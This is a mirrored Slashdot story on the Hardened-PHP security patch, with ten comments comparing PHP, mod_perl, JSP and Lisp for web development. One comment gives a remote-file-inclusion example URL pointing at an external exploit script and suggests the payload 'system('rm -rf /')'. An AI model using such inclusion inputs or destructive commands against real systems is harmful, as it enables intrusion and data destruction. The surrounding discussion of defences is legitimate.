Slashdot Mirror

← Back to Stories (view on slashdot.org)

Hardened PHP

Posted by michael on from the start-with-phpnuke-please dept.

Frank Kreuzbach writes "Yesterday the Hardened-PHP Project has announced its existence on the PHP-general mailinglist. It is the first public patch for PHP which adds security hardening features. It is meant as a proactive approach to protect servers against known and unknown weaknesses within PHP scripts or the engine itself. It enforces restrictions on include statements, adds canary protection to allocated memory and other internal structures and protects against internal format string vulnerabilities. It has syslog support and logs every attack together with the originating ip."

10 of 187 comments (clear)

  1. Re:Phew! by CTho9305 · · Score: 5, Informative

    It's a way to protect against buffer overflows. You put some known data on the stack, and before returning from each function call, make sure that data hasn't been changed. Most buffer overflow exploits work by overwriting part fo the stack, and canary protection will detect that the stack has been changed, so the exploit code will not run.

    --
    My server
  2. Other PHP Hardening Sites by Dozix007 · · Score: 5, Informative

    I run http://www.uberhacker.com . This site is dedicated to secure PHP programming. It is better to program secure rather than limit coding abilities. Secure programming allows for a wider range of scripts and security.

  3. Re:Already in use by abulafia · · Score: 4, Informative
    Weird. I do high-volume sites for a living, and mod_perl rocks. I sometimes fall back to coding something in C when it is called millions of times a day, but in general, mod_perl makes getting close to the iron really easy.

    shrugs.

    Hell, people probably can write fast software in PHP... I can't stand the language, myself, so I've never bothered to learn optimization tricks. Mod_perl kicks ass... as Slashdot knows, not to mention Amazon...

    Can a PHP devotee who also knows web development from a mod_perl standpoint explain why you like PHP so much? I'm honestly curious. I've modified other people's apps, and find the language both cumbersome to use for non-trivial things and overly low level, at the same time.

    --
    I forget what 8 was for.
  4. Not likely to get many replies by Anonymous Coward · · Score: 3, Informative

    Not many folks will qualify as knowing both. From my perspective, PHP was stable (MOD_PERL, several years back, was twitchy) and considerably simpler. Remember that to much of the programming world, Perl is weird.

  5. Re:Not quite by vlad_petric · · Score: 4, Informative
    Java Server Pages - jsp.

    Its advantages: faster (java isn't slow, it has a slow startup, which for a server is hardly a big deal), because the code you write is going to be converted in machine code; scales better (PHP still doesn't provide connection pooling; pconnect doesn't count, btw); more secure (no buffer overflow b/c of java, can use security policies to restrict what your pages are doing)

    Its disadvantage: well, you have to learn java. You can't just jump into writing jsp pages, as you'd do with php. But I can equally argue that that's an advantage as well, as it increases the quality of code.

    --

    The Raven

  6. Re:Already in use by nemesisj · · Score: 4, Informative

    I'm not extremely familiar with mod_perl, but I do lots of work in PHP.

    The reasons I like PHP better than perl for web development is the fact that you can escape in and out of execution (yes, this can be and is often abused) and I like how PHP wraps some of the more unreadable aspects of perl (like extracting arguments, etc) and has nice session support.

    Also, PHP seems to have a lot of standard web stuff rolled in by default. I know that you can configure perl to be whatever you want it to be, but back before I had access to my own servers whose environment I could control, this mattered a bit more.

    Anyway, just my two cents - it really comes down to personal preference between the two in my opinion - lots of the major disctinctions have gone away in the last couple of years.

    --

    $45 per U Colocation Special
  7. Re:Already in use by BusDriver · · Score: 4, Informative

    Turck MMCache dev stopped since the lead dev was taken in by Zend. That doesn't mean development has stopped though! New people have taken it over and are slowly coding new stuff up!

  8. There are many better alternatives to PHP by voodoo1man · · Score: 2, Informative
    A mini-language designed for one purpose will eventually become a general-purpose language (as PHP already has), and it doesn't mean it is well-designed in the first place (as my superficial familiarity with PHP tells me). That being said, there are many alternatives to PHP that work quite well.

    The ones I'm most familiar with are extensions of Common Lisp. There are 3 CL web servers, each with dynamic HTML generation capability (AllegroServe, Araneida, CL-HTTP). Then there's Lisp Server Pages, Active Lisp Pages, etc., and another whole load of CGI solutions. I use (and highly recommend) AllegroServe. There is a whole big list over at Cliki (which runs on Araneida).

    There are many CGI bindings for various Scheme implementations, and the PLT web server is kind of popular. I'm not very familiar with Scheme web solutions though, so I probably left something out.

    There is a lot of activity with Smalltalk-based web apps. Seaside is a continuation-based framework that gets a lot of attention. There's also AIDA/Web, and an unfinished mod.Smalltalk. I am not very familiar with Smalltalk web solutions either, so I probably missed a few.

    Python is a very popular option, and Zope seems to be a very popular framework. I don't know anything about web programming in Python aside from that.

    Take pretty much any of the recent lightweight (in the conference meaning of the term) languages, and you're bound to find good options, almost all of them better in terms of security and speed than PHP; I can't think of a single one that has a more annoying syntax or more convoluted and limited semantics than PHP, though. Another thing that you should consider is the website we're posting on is pretty interactive, and kind of popular, and it's written in Perl.

    --

    In the great CONS chain of life, you can either be the CAR or be in the CDR.

  9. Re:Really Now.. by Anonymous Coward · · Score: 2, Informative

    No, it's far worse than just reading "/etc/passwd", you could say "action=http://example.com/exploit.php", and PHP will happily (yet stupidly) execute the contents of "exploit.php", whatever that might be (say, "system('rm -rf /');" perhaps?).

    Because PHP was written with security as a distant afterthought.

  10. Re:Already in use by BusDriver · · Score: 2, Informative

    There is a 2.4.7-dev version from CVS that works quite well with PHP5!

    I don't think it's future is in doubt at all, just that the insane pace it was developed at has slowed a little bit.